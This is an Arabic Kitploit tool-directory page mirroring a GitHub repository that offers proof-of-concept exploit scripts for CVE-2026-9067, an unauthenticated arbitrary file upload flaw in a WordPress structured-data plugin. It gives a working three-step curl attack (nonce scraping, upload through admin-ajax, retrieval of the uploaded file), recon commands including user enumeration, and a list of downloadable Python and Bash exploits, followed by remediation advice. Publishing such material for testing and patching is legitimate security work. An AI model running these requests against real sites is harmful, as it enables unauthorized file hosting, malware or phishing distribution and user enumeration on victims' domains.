Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
By-Poloss..-..CVE-2026-9067 — Schema & Structured Data for WP & AMP < 1.60 - رفع وسائط تعسفي غير مصادق عليه [إثبات المفهوم واستغلال] | Kitploit
أدوات/GitHubGitHub/polosss/by-poloss..-..cve-2026-9067
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubpolosss/by-poloss..-..cve-2026-9067

By-Poloss..-..CVE-2026-9067

Schema & Structured Data for WP & AMP < 1.60 - رفع وسائط تعسفي غير مصادق عليه [إثبات المفهوم واستغلال]

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
3منذ 2 أشهرلم تتم المراجعة بعد

POC & Xploit - دليل إثبات المفهوم

توثيق واستغلال للثغرات التي تم العثور عليها في بيئة اختبار أمان ووردبريس.


قائمة الثغرات

CVE IDالإضافةالشدةالنوعالحالة
CVE-2026-9067Schema & Structured Data for WP & AMPعالية (8.1)رفع ملف غير مقيدموثق

CVE-2026-9067

ملخص سريع

وصف الثغرة

الإضافة Schema & Structured Data for WP & AMP قبل الإصدار 1.60 لم تتحقق من صلاحيات المستخدم في معالجات AJAX لرفع الملفات ولم تتحقق من نوع الملف المرفوع. وهذا يسمح لمهاجم غير مصادق برفع ملفات عشوائية.

التأثير

  • استضافة المحتوى: يمكن للمهاجم استضافة محتوى ضار على نطاق الضحية
  • استهلاك القرص: رفع ملفات عشوائية قد يستهلك مساحة القرص
  • إساءة السمعة: توزيع برمجيات خبيثة، صفحات تصيد من نطاق الضحية

ملاحظة مهمة: نواة WordPress تحظر الملفات القابلة للتنفيذ (.php, .phtml, .html, .svg)، وبالتالي لا يوجد مسار RCE مباشر من هذه الثغرة.

الملفات

root@kitploit:~
CVE-2026-9067/
├── CVE-2026-9067.md       # Dokumentasi lengkap (file ini)
├── CVE-2026-9067.py       # Python exploit dengan multi-threading
├── CVE-2026-9067.sh       # Bash/Shell PoC script
└── CVE-2026-9067_exploit.sh  # Alternative Bash PoC

إثبات المفهوم السريع

root@kitploit:~
# Step 1: Get nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\'](https://github.com/polosss/by-poloss..-..cve-2026-9067/blob/HEAD/%5Ba-f0-9%5D%7B10%7D)["\']' | grep -oP '[a-f0-9]{10}' | head -1)

# Step 2: Upload arbitrary file
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
  -F 'action=saswp_rf_form_image_upload' \
  -F "saswp_rf_form_nonce=$NONCE" \
  -F '[email protected];type=image/png;filename=evil.csv'

# Step 3: Access uploaded file
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"

معلومات البيئة


أوامر الاختبار

التحقق من حالة الموقع

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site

التحقق من إصدار الإضافة

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"

تعداد المستخدمين

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'

المعالجة

  1. ترقية الإضافة: تحديث Schema & Structured Data for WP & AMP إلى الإصدار 1.60 أو أحدث
  2. تعطيل الإضافة: إذا لم يكن التحديث ممكنًا، قم بتعطيل الإضافة
  3. التحصين:
    • تعيين ثابت DISALLOW_FILE_MODIFICATIONS
    • تعطيل تنفيذ PHP في دليل uploads عبر .htaccess
    • تنفيذ قواعد WAF

المراجع

  • NVD CVE-2026-9067
  • WPScan Vulnerability Database
  • WordPress Plugin Page
  • الباحث الأصلي: 0xBassia
تنزيل الأداة
الحقلالقيمة
معرف CVECVE-2026-9067
الإضافةSchema & Structured Data for WP & AMP
الإصدارات المتأثرة< 1.60
CWECWE-434 (رفع ملف غير مقيد من نوع خطير)
CVSS v3.18.1 (عالية)
المكتشف0xBassia
الحقلالقيمة
الهدف URLhttps://yorbit7.ddev.site
إصدار PHP8.4
قاعدة البياناتMariaDB 11.8
إصدار WordPress7.0
طريقة الاختبارcurl (اختبار الصندوق الأسود)